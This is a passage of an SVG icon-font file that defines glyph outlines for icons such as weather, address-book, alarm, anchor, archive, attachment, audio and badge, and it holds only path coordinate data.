1-78-35-78-76-1-13 8-23 20-24z m326 15c-18 20-41 28-67 22-24-5-39-21-46-44-1-5-1-10-1-16 0-11 9-20 20-21 12-1 21 6 23 18 4 17 10 22 22 20 14-3 24-16 22-31-3-20-19-33-42-33-29-1-57 0-86 0-13 0-21-6-23-16-4-14 4-27 19-28 18-1 36 0 53 0 23 0 46-3 68 4 53 18 73 84 38 125z" />
<glyph glyph-name="windy-night" horiz-adv-x="1000" unicode="&#xee9a;" d="M458 228c44 1 75 22 93 62 16 37 8 81-21 110-31 30-68 39-109 24-8-3-11-3-14 5-27 67-89 104-160 95-64-7-115-58-127-127-1-4 0-10-5-12-12-5-21-11-28-20v0s-54-51-1-110c1-2 3-3 4-5l1-1 0 0c13-12 29-19 50-21 20-2 41 0 62-1l179 0c27 0 52 0 76 1z m-125 298c28-12 52-32 69-60 3 0 6 0 9 0 47 0 77 40 78 73-12-14-26-22-43-24-17-1-32 4-46 15-11 10-17 22-20 36-3 22 4 41 20 57-15-1-28-7-40-16-17-14-27-33-29-56-1-8 0-17 2-25z m191 112c0 0 1-1 1-2l2-9c1-2 4-3 5-1l6 7c0 1 1 1 2 1l9-1c2 0 4 2 3 4l-5 8c-1 1-1 2 0 3l3 8c1 2-1 4-3 4l-9-3c-1 0-1 0-2 1l-7 6c-2 2-4 0-4-2l-1-9c0-1-1-2-1-2l-8-5c-2-1-2-4 0-5l9-3z m-40-87l9-3c0 0 1-1 1-2l2-9c1-2 4-3 5-1l6 7c0 1 1 1 2 1l9-1c2 0 4 2 3 4l-5 8c-1 1-1 2 0 3l3 8c1 2-1 4-3 4l-9-3c-1 0-1 0-2 1l-7 6c-2 2-4 0-4-2l-1-9c0-1-1-2-1-2l-8-5c-2-1-2-4 0-5z m-64 19c0 0 1 0 1-1l1-6c0-1 2-2 3-1l4 5c0 0 1 1 2 0l6 0c1 0 2 1 1 3l-3 5c0 0 0 1 0 1l2 6c1 1 0 3-2 2l-6-1c0 0-1 0-1 0l-5 4c-1 1-3 1-3-1l0-6c0 0-1-1-1-1l-5-3c-2-1-1-3 0-4l6-2z m57 19c1 0 1 0 1 0l1-4c0-1 1-2 2-1l3 3c0 0 0 1 1 1l4-1c1 0 1 1 1 2l-2 4c0 0 0 0 0 1l1 3c1 1 0 2-1 2l-4-1c-1 0-1 0-1 0l-3 3c-1 1-2 0-2-1l-1-4c0 0 0-1 0-1l-4-2c-1 0-1-2 0-2l4-2z m-155 3c0 0 1 0 1 0l1-4c0-1 1-1 1 0l3 3c0 0 0 0 0 0l4 0c1 0 1 1 1 1l-2 3c0 1 0 1 0 1l1 3c1 1 0 2-1 2l-3-1c-1 0-1 0-1 0l-3 2c0 1-1 1-1 0l-1-4c0 0 0 0 0-1l-3-1c-1-1-1-2 0-2l3-2z m369-315c-38 0-77 0-115 0l-1 0c-8-20-20-35-36-45 52 0 104 1 155 0 54 0 94-43 89-96-4-37-47-65-81-53-27 11-40 43-25 65 13 17 37 18 51 2 8-10 20-11 30-4 9 6 11 19 5 29-14 24-47 36-77 29-58-16-77-81-42-130 16-22 38-33 64-38h25c9 3 19 5 29 9 58 25 83 94 54 154-25 52-67 78-125 78z m-95 125c13-1 24 6 24 19 1 21 17 34 31 34 21 2 40-12 46-31 10-34-17-74-52-76-22-2-44-2-67-2 5-14 6-29 4-43 20 0 39-1 58 0 56 0 105 50 104 106-1 52-38 89-90 91-41 2-77-34-77-75 0-13 8-22 19-23z m-37-197c-11 3-23 2-35 2h-121v0c-46 0-93 0-140 0-16 0-26-8-27-21 0-12 6-20 17-22 13-3 26-2 39-2 84 0 167 0 251 0 8 0 15-1 16-9 1-10-5-12-13-14-13-3-21-12-20-24 2-12 11-19 24-19 27 0 51 22 54 49 3 29-17 55-45 60z m361 211c-17 20-40 28-66 22-24-5-39-21-46-44-1-5-1-10-1-15 0-12 8-20 20-21 11-1 20 5 23 17 4 17 10 22 22 20 14-2 23-16 21-30-3-21-19-34-42-34-28 0-56 0-84 0-13 0-21-6-24-16-3-14 5-26 20-27 17-1 35 0 52 0 23 0 46-3 68 4 52 18 72 84 37 124z" />
<glyph glyph-name="windy-raining" horiz-adv-x="1000" unicode="&#xee9b;" d="M524 468c-31 29-67 38-107 23-8-3-11-3-15 6-26 65-87 102-157 93-64-7-114-57-126-126 0-4 0-9-5-11-11-5-20-12-27-20v0s-54-50-1-108c1-2 2-4 4-5l1-1 0 0c12-12 29-20 49-21 20-2 41 0 61-1l177 0c27 0 51 0 76 0 42 2 73 23 91 62 16 37 8 80-21 109z m-373-215c-6 3-11 0-16-5-18-18-36-36-55-54-7-7-11-15-3-23 8-7 16-4 23 3 18 18 35 36 53 53 3 3 7 7 7 12 0 7-3 11-9 14z m168-3c-5 3-9 1-13-3l-43-44c-6-5-9-11-3-17 7-7 13-4 18 2 14 14 28 28 42 42 3 3 6 5 6 9 0 6-2 9-7 11z m80-1c-20-19-39-39-58-58-4-4-5-9-2-14 3-5 7-8 14-8 3 0 6 1 8 4 19 19 38 37 57 56 5 6 5 13-1 19-6 6-13 6-18 1z m71-29c-1 0-3 0-4-1-13-8-24-19-33-33-3-5 0-10 4-14 5-4 10-5 15-2 11 9 22 19 30 31 6 8-2 19-12 19z m-262 1c-11-8-21-18-28-29-7-8 1-20 12-20 1 0 2 0 3 1 13 8 24 19 32 32 3 5 1 11-4 15-4 4-10 5-15 1z m482 130c-39 0-78 0-116 0l0 0c-9-20-21-35-37-45 52 0 104 0 156 0 54 0 94-44 89-96-4-38-47-66-81-53-28 10-40 43-25 64 13 18 36 19 51 2 8-9 20-11 30-3 9 6 11 19 5 29-14 24-47 36-77 29-59-16-78-82-43-131 16-22 39-33 64-38h25c10 3 20 5 30 9 59 26 83 94 54 155-24 52-67 78-125 78z m-95 125c12-1 23 7 24 20 0 21 16 34 30 34 21 2 41-12 47-32 10-33-17-73-52-76-23-2-45-2-68-1 5-14 7-29 5-44 19 0 38 0 58 0 56 0 105 50 104 106-1 53-38 90-90 92-41 2-78-34-78-75 0-13 8-23 20-24z m325 15c-18 20-40 28-66 22-24-5-39-21-46-44-2-5-2-11-2-16 1-12 9-20 20-21 12-1 21 6 24 18 4 16 9 22 21 20 14-3 24-16 22-31-3-20-19-33-42-33-28-1-57 0-85 0-13 0-21-6-24-16-3-14 5-27 20-28 18-1 35 0 53 0 22 0 45-3 68 4 52 18 72 84 37 125z" />
<glyph glyph-name="windy-sunny" horiz-adv-x="1000" unicode="&#xee9c;" d="M452 241c43 2 74 22 91 62 16 37 8 80-21 108-30 30-66 38-107 23-7-2-10-3-14 6-26 65-87 101-157 93-63-7-113-57-125-125 0-4 0-9-5-11-11-5-20-12-27-20v0s-54-50-1-108c1-2 2-4 4-5l1-1 0 0c12-12 29-19 48-21 21-2 41 0 62-1l176 0c27 0 51-1 75 0z m-184 314c-1-3-2-6-3-9 50 1 95-21 123-61 2 2 3 5 4 7 18 34 4 76-30 93-35 18-77 4-94-30z m142-25c-1-4 1-8 5-10 1-1 3-2 4-2 11 1 21 1 31 2 6 1 9 5 9 10 0 6-4 10-9 10-11 0-22-1-32-2-4 0-8-4-8-8z m-43 62c5-2 11 0 14 5 2 4 4 9 6 13l6 13 1 0c2 5 0 11-5 14-5 2-11 0-13-5-5-9-9-17-13-26-3-5-1-11 4-14z m47-100c-5 3-11 0-13-4-2-5 0-11 5-14 4-2 9-4 13-6 5-2 9-5 13-7 5-2 11-1 13 4 3 5 2 11-3 14-9 4-19 9-28 13z m-190 84c4-2 9-4 13-7 4-2 9-4 13-6 5-3 11-1 13 4 3 4 1 10-4 13-9 5-18 10-27 14-5 2-11 0-13-5-2-5 0-11 5-13z m176-15c4-1 7-2 10 0 9 6 17 12 26 17 4 3 5 9 2 14-3 4-9 6-13 3-9-6-18-11-26-17-6-4-5-14 1-17z m-79 43c6-4 14 1 14 9-1 10-1 20-2 30 0 5-5 9-10 9-6-1-10-5-10-11 1-10 1-19 2-29 0-4 2-7 6-8z m-49-12c1-1 3-2 4-3 4-2 9-1 12 2 3 3 4 8 1 12-5 8-11 17-16 25-3 5-9 6-14 3-5-4-6-9-3-14l16-25z m414-298c-39 0-79 0-118 0l0 0c-9-20-22-35-37-45 52 0 105 0 158-1 55 0 96-44 90-97-4-39-47-67-82-55-28 11-41 44-25 66 13 18 37 19 51 2 9-10 21-11 31-4 9 7 11 20 5 30-14 25-48 37-78 29-60-16-79-83-44-132 17-23 39-34 66-39h25c10 3 20 5 30 9 60 26 85 96 55 157-25 54-69 80-127 80z m-97 127c13-1 24 7 24 20 1 21 18 35 31 35 22 2 42-12 48-32 10-34-17-75-53-78-23-2-46-1-68-1 4-14 6-30 4-45 20 0 39 0 59 0 57 0 107 51 106 108-1 54-39 92-92 94-42 2-78-35-79-77 0-13 8-23 20-24z m-38-200c-12 2-24 2-36 2h-123v0c-48 0-96 0-144 0-16 0-26-8-27-22 0-12 6-20 18-23 12-2 26-1 39-1 85 0 171 0 257 0 7 0 15-1 16-10 1-10-6-12-14-14-13-3-21-12-19-24 1-12 11-20 24-20 27 0 52 23 55 50 3 30-17 56-46 62z m369 215c-18 21-41 29-68 23-24-5-39-21-46-45-2-5-2-11-2-16 1-12 9-20 21-21 11-1 20 5 23 17 4 18 10 23 22 21 15-3 24-17 22-31-3-21-19-34-42-34-29 0-58 0-87 0-13 0-21-6-24-16-4-15 5-28 20-29 18 0 36 0 54 0 23 1 46-3 69 5 53 17 74 85 38 126z" />
<glyph glyph-name="windy-thunder-raining" horiz-adv-x="1000" unicode="&#xee9d;" d="M523 469c-30 30-66 38-107 23-7-2-10-3-14 6-26 66-88 102-157 94-64-8-114-58-126-126 0-4 0-9-5-11-11-5-20-12-27-20v0s-54-51-2-109c2-2 3-3 5-5l1-1 0 1c12-13 29-20 48-22 21-2 41 0 62 0 8-1 9 4 11 10l29 105c1 8 4 11 13 11 27-1 55-1 82 0 9 0 10-3 8-11-6-19-11-39-17-61h89c-13-18-25-35-39-54 27 0 52-1 76 0 43 2 74 22 91 61 17 37 8 81-21 109z m-209-134c-9 0-12 1-9 11 6 17 9 34 14 51 2 7 1 9-6 9-16-1-31-1-47 0-5 0-8-2-10-7-9-34-19-69-28-103-2-5 0-8 6-8 12 1 24 0 36 0 10 1 13 0 11-11-10-38-19-77-27-115l2-1c41 57 81 115 124 174-25 0-46 0-66 0z m-163-81c-6 3-12 1-16-4-18-18-36-36-55-54-7-7-11-15-3-23 8-8 16-4 23 3l53 53c3 3 6 7 6 12 1 6-2 11-8 13z m247-4c-19-19-38-38-57-57-4-4-5-10-2-15 2-5 7-8 14-7 2-1 5 1 8 4 19 18 38 37 56 56 6 6 6 13 0 19-6 6-13 6-19 0z m71-28c-1 0-2-1-3-1-14-8-24-20-33-33-3-5 0-10 4-14 4-4 10-5 14-2 12 9 23 19 31 30 5 8-3 20-13 20z m-261 1c-11-9-21-18-29-29-6-9 2-21 13-20 0 0 2 0 3 1 13 8 23 19 32 31 3 5 1 12-4 16-4 4-10 5-15 1z m481 128c-39 0-78 0-117 0l0 0c-9-20-21-35-37-45 52 0 104 0 157 0 54 0 94-44 89-97-4-38-47-66-81-54-28 11-41 44-25 65 12 18 36 19 51 3 8-10 20-12 30-4 9 6 11 19 5 29-14 25-47 37-77 29-60-15-78-82-43-131 16-22 39-33 64-39h25c10 4 21 6 30 10 59 25 84 94 55 155-25 53-68 79-126 79z m-96 126c13-1 23 7 24 19 1 22 17 35 31 35 21 2 41-12 47-32 10-34-17-74-53-76-22-2-45-2-67-2 5-14 6-29 4-44 19 0 39 0 58 0 57 0 107 51 105 107-1 53-38 90-91 93-41 1-78-35-78-76 0-13 8-23 20-24z m327 15c-18 20-41 28-67 22-24-5-39-21-46-45-1-5-1-10-1-15 0-12 8-20 20-21 12-1 20 5 23 17 4 17 10 23 22 20 14-2 24-16 22-30-3-21-19-34-42-34-29 0-57 0-86 0-13 0-21-6-24-16-3-14 5-27 20-28 18-1 36 0 53 0 23 1 46-3 68 4 53 18 73 85 38 126z" />
<glyph glyph-name="windy-thunder" horiz-adv-x="1000" unicode="&#xee9e;" d="M523 469c-30 30-66 38-107 23-7-2-10-3-14 6-26 66-88 102-157 94-64-8-114-58-126-126 0-4 0-9-5-11-11-5-20-12-27-20v0s-54-51-2-109c2-2 3-3 5-5l1-1 0 1c12-13 29-20 48-22 21-2 41 0 62 0 8-1 9 4 11 10l29 105c1 8 4 11 13 11 27-1 55-1 82 0 9 0 10-3 8-11-6-19-11-39-17-61h89c-13-18-25-35-39-54 27 0 52-1 76 0 43 2 74 22 91 61 17 37 8 81-21 109z m-209-134c-9 0-12 1-9 11 6 17 9 34 14 51 2 7 1 9-6 9-16-1-31-1-47 0-5 0-8-2-10-7-9-34-19-69-28-103-2-5 0-8 6-8 12 1 24 0 36 0 10 1 13 0 11-11-10-38-19-77-27-115l2-1c41 57 81 115 124 174-25 0-46 0-66 0z m375 16c-39 0-78 0-117 0l0 0c-9-20-21-35-37-45 52 0 104 0 157 0 54 0 94-44 89-97-4-38-47-66-81-54-28 11-41 44-25 65 12 18 36 19 51 3 8-10 20-12 30-4 9 6 11 19 5 29-14 25-47 37-77 29-60-15-78-82-43-131 16-22 39-33 64-39h25c10 4 21 6 30 10 59 25 84 94 55 155-25 53-68 79-126 79z m-96 126c13-1 23 7 24 19 1 22 17 35 31 35 21 2 41-12 47-32 10-34-17-74-53-76-22-2-45-2-67-2 5-14 6-29 4-44 19 0 39 0 58 0 57 0 107 51 105 107-1 53-38 90-91 93-41 1-78-35-78-76 0-13 8-23 20-24z m327 15c-18 20-41 28-67 22-24-5-39-21-46-45-1-5-1-10-1-15 0-12 8-20 20-21 12-1 20 5 23 17 4 17 10 23 22 20 14-2 24-16 22-30-3-21-19-34-42-34-29 0-57 0-86 0-13 0-21-6-24-16-3-14 5-27 20-28 18-1 36 0 53 0 23 1 46-3 68 4 53 18 73 85 38 126z" />
<glyph glyph-name="windy" horiz-adv-x="1000" unicode="&#xee9f;" d="M454 300c43 1 74 22 91 61 17 37 8 81-21 109-30 30-66 38-107 24-8-3-11-3-14 5-27 66-88 102-158 94-64-7-114-58-126-126 0-4 0-9-5-11-11-5-20-12-27-20l0 0s-54-51-1-109c1-2 2-3 4-5l1-1 0 0c13-12 29-19 49-21 20-2 41 0 61-1l177 1c27-1 52-1 76 0z m231 53c-40 0-80 0-119 0l0 0c-9-20-22-35-37-45 53 0 106 0 159-1 55 0 96-44 90-98-4-38-47-67-82-54-28 10-41 44-26 66 13 17 38 19 52 2 9-10 21-12 31-4 10 7 12 19 6 30-15 25-49 37-79 29-61-16-80-83-44-133 16-23 39-34 66-39h25c10 3 21 5 30 9 60 26 85 97 56 159-26 53-70 79-128 79z m-98 128c13-1 24 7 25 20 1 21 17 35 31 35 21 2 42-12 48-32 10-35-17-75-53-78-23-2-46-2-69-1 5-15 6-30 4-45 20 0 40-1 59 0 58 0 108 51 107 108-1 54-39 92-92 94-42 2-79-34-80-77 0-13 8-23 20-24z m-38-201c-12 2-24 1-36 1h-124v0c-48 0-96 1-144 0-17 0-26-8-27-21-1-12 6-21 17-23 13-3 26-1 39-1 87-1 173-1 259 0 8 0 15-1 16-10 1-10-6-13-14-14-13-3-21-13-19-25 1-12 11-20 24-20 28 1 52 23 55 51 3 30-17 56-46 62z m370 216c-17 21-41 29-67 23-25-5-40-21-47-45-2-6-2-11-2-16 1-12 9-21 21-22 12-1 21 6 24 18 4 17 10 23 22 21 14-3 24-17 22-31-3-21-19-34-43-35-29 0-58 1-87 0-13 0-21-6-24-16-4-14 5-27 20-28 18-1 36 0 54 0 23 0 47-3 69 4 54 18 75 86 38 127z" />
<glyph glyph-name="addons" horiz-adv-x="1000" unicode="&#xeea0;" d="M882 614c-24 44-55 82-93 115-10 10-27 8-36-4-14-19-29-38-43-57-9-12-7-28 3-38 134-126 126-327 12-444-49-51-112-81-177-91v298c1 0 2 2 3 2 13 4 26 9 38 17 28 19 44 46 44 81 0 37 0 74 0 112v5h-37v6c0 32 0 64 0 96 0 5-2 10-4 13-5 9-18 12-28 9-11-4-16-11-16-22v-101h-95v4c0 32 0 65 1 98 0 9-5 16-13 20-16 7-36-3-35-22 1-32 0-64 0-95v-6h-39v-121c0-15 4-30 12-44 16-27 41-43 71-50 0 0 1-1 1-1v-300c-58 9-114 34-160 76-67 62-103 139-103 229-1 92 33 169 99 230 10 10 12 27 3 39-14 19-29 38-43 57-9 11-26 13-37 4-129-114-184-302-122-474 67-184 257-316 473-286 189 26 350 180 374 384 10 92-8 179-53 261z" />
<glyph glyph-name="address-book" horiz-adv-x="1000" unicode="&#xeea1;" d="M744 785c-8 2-16 2-24 2-157 0-314 0-471 0h-14v-874h489c3 0 6 0 10 0 28 2 45 19 46 48 0 4 0 9 0 14v750c0 6 0 12 0 18-2 23-14 37-36 42z m-375-562v7c0 1 0 1 0 1 2 19 13 29 31 35 17 6 34 13 50 20 16 6 24 18 26 34 1 7-3 13-7 18-23 30-26 63-18 97 7 28 31 44 59 43 28-2 50-20 56-47 5-24 3-48-6-71-3-7-7-13-11-19-13-16-11-38 7-50 8-5 18-9 28-13 12-5 24-9 36-13 20-8 27-19 27-42h-278z m-186 565c-45 0-62-17-62-62v-2c0-249 0-498 0-747 0-8 1-17 2-25 4-20 15-33 35-36 16-3 32-3 50-4v875h-25v1z m696-160v-121c0-16-13-29-29-29h-41v180h41c16 0 29-14 29-30z m0-232v-121c0-16-13-29-29-29h-41v179h41c16 0 29-13 29-29z m0-232v-121c0-17-13-30-29-30h-41v180h41c16 0 29-13 29-29z" />
<glyph glyph-name="adjust" horiz-adv-x="1000" unicode="&#xeea2;" d="M500 788c-242 0-437-196-437-438 0-242 195-438 437-438 242 0 438 196 438 438 0 242-196 438-438 438z m0-823c-213 0-385 172-385 385 0 213 172 385 385 385s385-172 385-385c0-213-172-385-385-385z m0 721v-672c185 0 336 151 336 336 0 185-151 336-336 336z" />
<glyph glyph-name="alarm" horiz-adv-x="1000" unicode="&#xeea3;" d="M893 94c0 2-3 5-5 7-19 15-39 29-57 46-38 38-63 83-67 139-2 38-2 76-4 114-2 46-8 92-21 136-27 89-78 152-168 174-2 1-5 6-5 9-1 34-24 62-56 68-31 5-61-15-71-47-2-4-3-9-3-14-1-8-4-15-5-16-1 0-2 0-3-1-63-16-110-53-141-113-20-38-32-78-38-121-9-55-11-110-11-166 1-46-12-88-38-126-23-33-52-60-85-81-3-2-7-5-7-8-1-22-1-43-1-65h787c0 22 0 43-1 65z m-268-107h-249c-8 0-11-6-8-13l22-48c3-7 12-14 20-14h182c7 0 16 6 20 14l21 48c3 7-1 13-8 13z" />
<glyph glyph-name="anchor" horiz-adv-x="1000" unicode="&#xeea4;" d="M888 98l-40 174c-4 20-29 28-45 14l-130-121c-16-14-10-40 10-46l34-11c-20-23-44-43-71-59-30-18-63-30-98-36v371h77c10-6 21-9 32-9 32 0 58 25 58 57s-26 58-58 58c-11 0-22-3-32-9h-77v40c52 19 89 70 89 129 0 76-62 137-137 137s-138-61-138-137c0-59 37-110 89-129v-40h-77c-9 6-20 9-32 9-32 0-58-26-58-58s26-57 58-57c12 0 23 3 32 9h77v-371c-34 6-68 18-98 36-27 16-51 36-71 59l34 11c20 6 26 32 11 46l-131 121c-15 14-40 6-45-14l-39-174c-5-20 14-38 34-32l38 12c31-45 72-84 120-112 59-35 127-53 196-53s136 18 195 53c48 28 89 67 121 112l37-12c20-6 39 12 35 32z m-351 534c-7-14-21-23-37-23-17 0-31 9-37 23-3 6-4 12-4 18 0 23 18 41 41 41 23 0 41-18 41-41 0-6-2-12-4-18z" />
<glyph glyph-name="archive" horiz-adv-x="1000" unicode="&#xeea5;" d="M129 460c-4 0-7 0-10 1v-447c0-29 24-53 52-53h658c29 0 52 24 52 53v447c-3-1-6-1-9-1l-743 0z m519-198h-296c-15 0-26 12-26 26v70c0 14 11 26 26 26h296c15 0 26-12 26-26v-70h1c0-14-12-26-27-26z m290 417c0 33-27 60-60 60h-755c-34 0-60-27-60-60v-121h56v-45h762v45h57l0 121z" />
<glyph glyph-name="at" horiz-adv-x="1000" unicode="&#xeea6;" d="M936 490c-5 55-20 103-42 142-23 39-52 70-87 94s-75 41-120 50-92 11-140 6c-92-9-169-31-233-68-64-36-115-80-154-131-38-52-65-108-80-168-16-61-21-120-15-177 6-61 20-113 44-155 24-43 54-77 90-103 36-27 77-45 123-54 46-10 93-13 143-8 21 2 41 5 62 8 21 4 40 8 59 13 18 4 35 10 51 16 15 7 29 13 40 20-6 15-12 29-18 44-7 15-14 29-21 42-22-11-47-20-75-27-28-7-59-12-92-15-36-4-71-2-103 5s-62 19-88 37c-26 19-47 44-64 76s-28 70-33 116c-5 51-1 101 13 150 13 49 34 93 65 133 30 40 69 72 116 99 47 26 102 42 165 48 82 8 147-5 196-40 49-35 77-90 84-164 3-26 2-53-2-81-4-28-11-54-21-78-11-23-24-43-42-59-17-16-38-25-61-28-15-1-26 0-33 5l30 333c-25 7-52 11-80 12-29 2-57 1-86-1-38-4-73-15-105-33-31-18-59-41-81-70-23-29-39-62-50-100-11-38-15-78-11-122 3-28 9-51 19-70 10-20 23-35 37-47 15-12 32-20 51-24 18-5 38-6 58-4 33 3 59 9 79 19 21 9 40 20 59 31 27-22 64-31 111-26 41 4 77 18 109 40 32 23 58 51 79 84 21 33 36 70 46 110 9 40 12 80 8 120z m-390-257c-11-5-21-8-30-11-9-3-20-5-33-6-21-2-38 3-52 14-14 12-22 32-25 61-2 23-1 45 3 66s11 41 22 58c10 17 22 31 38 42 15 11 34 18 55 20 7 1 14 1 20 1 6 0 13-1 20-2l-18-243z" />
<glyph glyph-name="attachment" horiz-adv-x="1000" unicode="&#xeea7;" d="M739 713v-372c0-62-49-112-111-112-33 0-63 15-84 39-8 9-14 20-19 32-5 12-8 27-8 41v335c0 7 1 15 3 21 9 31 37 53 71 53 38 0 70-29 74-67 0-2 0-5 0-7v-335c0-21-16-37-37-37s-37 16-37 37v298h-37v-298c0-15 5-30 13-41 11-17 29-29 50-32 4-1 7-1 11-1s8 0 12 1c3 0 7 1 11 2 30 10 52 38 52 71v335c-1 62-50 112-112 112-54 0-100-39-109-91h-227c-17 0-32-14-32-32v-721c0-17 15-32 32-32h490c17 0 31 15 31 32v769h-37z m13-738c0-16-12-29-28-29h-448c-16 0-29 13-29 29v659c0 17 13 30 29 30h204v-166h-130v-32h130v-67h-130v-32h130v-45c1-8 2-15 5-22h-135v-32h148c18-32 47-56 81-68h-229v-32h300v26c43 6 80 31 102 65v-284z m-402 126h300v-32h-300l0 32z" />
<glyph glyph-name="audio" horiz-adv-x="1000" unicode="&#xeea8;" d="M812 668c-6 6-16 6-22 0l-25-25c-6-6-6-16 0-22 69-76 105-166 106-270 0-106-37-196-106-272-6-7-6-16 0-22l25-25c6-6 16-6 22 0 169 176 166 464 0 636z m-349-19c-15-14-30-28-44-41-41-39-82-78-123-117-6-5-12-8-20-8-34 0-69 0-103 0-18 0-36 0-54 0h-1v-265c2-1 4-1 6-1h49c34 0 68 0 101 0 7 0 12-2 17-6 55-52 111-103 166-155 3-2 6-5 9-7 4-4 8-1 8 8v587c0 8-5 10-11 5z m254-75c-6 6-15 5-21 0l-25-25c-6-6-6-16 0-22 43-50 66-109 66-177 0-68-23-128-67-178-5-6-5-16 1-22l25-24c5-6 15-6 21 0 124 132 109 337 0 448z m-93-95c-6 6-16 6-21 0l-26-25c-6-6-6-16-1-22 18-23 28-51 28-82 0-32-10-59-28-82-5-7-5-16 1-22l25-26c6-6 16-6 21 0 65 73 63 189 1 259z m-561 4v-265c1-1 2-1 3-1h30v266c-11 0-22 0-33 0l0 0z" />
<glyph glyph-name="automation" horiz-adv-x="1000" unicode="&#xeea9;" d="M323 365c1-1 2-2 2-5-3-12-4-24-3-36 0-3-1-5-4-6-12-5-23-10-35-15-7-3-14-6-21-9l-2-1c-1 0-1-4 0-8 6-18 11-35 17-53 2-4 6-7 11-6 5 2 11 3 16 4 13 3 26 5 38 8 4 1 6 0 9-3 7-9 15-18 23-27 2-2 2-3 1-6-7-19-15-38-22-57-1 0-1-1-1-2 0-1 3-3 6-5 17-9 33-17 49-26 4-2 9 0 12 3 1 3 3 6 5 9 9 13 18 27 26 41 2 2 3 2 5 2 13-1 25-2 37-3 3 0 5-1 6-4 5-11 10-23 14-34 3-6 6-12 8-18 2-4 7-7 11-5 17 5 34 11 52 17 4 1 7 6 6 10l-4 20c-3 12-5 25-8 37-1 2 0 3 2 5 10 8 19 16 28 25 2 1 4 2 6 1 20-8 39-15 59-23l1 0c1 0 3 3 5 7 3 5 6 10 8 15 6 12 12 25 19 38 1 2 1 4-2 5-17 11-35 22-52 33-2 1-3 2-2 5 3 12 4 25 3 38 0 2 0 3 2 4 14 6 27 12 41 18l12 6c5 2 7 7 5 11-5 17-11 34-17 52-1 4-6 7-10 6-3-1-6-2-9-2l-46-11c-3-1-5-1-7 2-6 11-15 20-24 28-2 2-2 3-1 5l22 60c1 2 1 3-1 4-20 10-39 20-58 30-1 0-1 0-1 0-1 1-2-1-4-2l-2-4-31-49c-2-3-3-3-6-3-12 3-24 4-37 3-2 0-4 1-5 3-6 14-12 28-18 41-2 4-4 8-6 12-1 4-6 6-11 5-17-6-34-11-51-17-5-1-7-6-6-10 0-3 1-6 2-9 3-15 7-31 11-46 1-4 0-6-3-8-10-6-19-14-27-23-2-2-4-3-7-1-19 7-38 15-58 22 0 1-1 1-2 1-1 0-2 0-2-1l-1-2c-10-19-19-38-29-56-1-3-1-4 2-5 18-12 36-23 54-35z m225-12c13-39-7-75-43-87-31-11-67 7-80 37-2 4-4 11-5 15-6 29 14 65 42 74 30 9 73-1 86-39z m346 252c14 4 27 9 40 13l3 1c1 0 1 4 0 9-2 11-5 22-7 34-1 4-5 8-9 7l-7-1c-11-1-22-2-33-4-3 0-4 2-5 3-5 8-10 15-15 22-1 2-1 4 0 6 6 13 13 26 19 38 2 3 2 5-1 6-12 8-24 16-37 23 0 1-1 1-1 1-1 1-3 1-3 0l-2-2c-9-11-17-23-26-34-2-2-3-2-5-2-9 2-18 4-26 5-3 1-4 1-5 4-4 14-8 28-12 43 0 0 0 0-1 1 0 0-4 0-8-1l-36-7c-4-1-7-6-7-10 1-6 2-11 2-17 1-7 2-14 2-22 0-1 0-3-2-4l-21-16c-2-1-3-1-5 0-13 6-26 13-39 20-3 1-4 1-5-2-8-12-16-25-24-37-1-2-1-4 1-5l33-27c2-2 3-3 2-6-1-8-3-16-3-24-1-3-2-5-5-6-14-4-28-8-43-12 0 0-1 0-1-1-1 0 0-4 0-8 3-12 5-24 8-36 1-4 5-7 8-7l7 1c12 1 23 2 34 4 2 0 4-1 5-3 4-7 9-14 14-20 2-3 2-4 1-6-7-13-13-26-20-39 0 0-1-1-1-2-1 0 1-3 3-4l5-3c11-7 21-13 32-20 2-2 3-1 5 1l28 34c2 2 3 2 5 2 8-2 17-3 25-5 2 0 3-1 4-3 5-14 9-28 14-42l0-2c1-1 5-1 9 0l34 8c5 1 8 5 7 10l-1 16c-1 8-2 15-3 22 0 2 0 3 2 5 8 5 15 10 23 15 2 1 3 1 5 0l36-19c1-1 2-1 3-2 1-1 4 2 7 5 6 11 13 21 20 31 2 4 3 8 3 8-1 1-1 1-2 2-12 9-23 18-35 27-2 2-2 3-2 5 2 9 4 17 6 25 0 2 1 3 3 4z m-109-42c-27-9-54 9-61 31-8 28 6 56 34 64 23 6 51-10 58-33 10-30-9-55-31-62z m-222-539c-32-10-65-15-98-15-137 0-257 87-300 217-39 122-3 254 94 338l15 12c4 3 4 9 2 12l-44 56c-2 4-7 4-11 1l-17-14c-125-107-172-276-121-432 54-166 208-277 382-277 43 0 85 6 125 20 38 12 74 30 106 52l18 14c4 2 5 7 2 11l-43 55c-3 4-8 5-12 2l-16-11c-25-17-53-31-82-41z" />
<glyph glyph-name="badge" horiz-adv-x="1000" unicode="&#xeeaa;" d="M838 44l-115 256-7-4c-3-2-5-4-6-6l-29-46c-9-14-25-23-42-24l-54-2c-3 0-5-1-8-2l-7-4-54-120 74-166c8-16 30-18 41-3l56 81c7 9 15 14 21 10l108-3c17-1 29 17 22 33z m-309 146c-7-3-16-5-24-5-8 0-16 2-24 6l-13 7-35 18c-2 1-5 2-8 2l-54 2c-17 1-32 10-41 24l-30 46c-1 2-3 4-5 6l-15 9-118-261c-7-16 4-34 21-34h1l109 4c8 0 15-4 19-10l57-82c5-6 12-10 19-10 9 0 18 5 22 14l90 200 29 64z m-284 251c4-6 5-13 6-20l2-54c0-8 4-15 11-19l3-2 24-15 19-12c6-3 11-8 14-14l29-46c4-6 11-10 19-11l54-2c7-1 14-2 20-5l3-2 45-23c4-2 7-3 11-3 4 0 7 1 11 3l48 25c1 0 3 1 4 1 5 2 10 4 16 4l1 0 53 2c8 1 15 5 19 11l29 46c4 6 9 11 14 14l46 30c6 4 10 11 11 18l2 55c1 6 2 13 5 19l25 48c4 7 4 15 0 22l-24 48c-4 6-5 13-6 20l-2 54c0 8-4 15-11 19l-46 29c-6 4-11 9-14 14l-29 46c-4 7-11 11-19 11l-54 2c-7 1-14 3-20 6l-48 25c-4 2-7 2-11 2-4 0-7 0-11-2l-48-25c-6-3-13-5-20-5l-54-3c-8 0-15-4-19-11l-29-45c-4-6-9-11-14-15l-46-29c-7-4-11-11-11-19l-3-54c0-7-2-14-5-20l-25-48c-3-7-3-15 0-22l25-48z" />
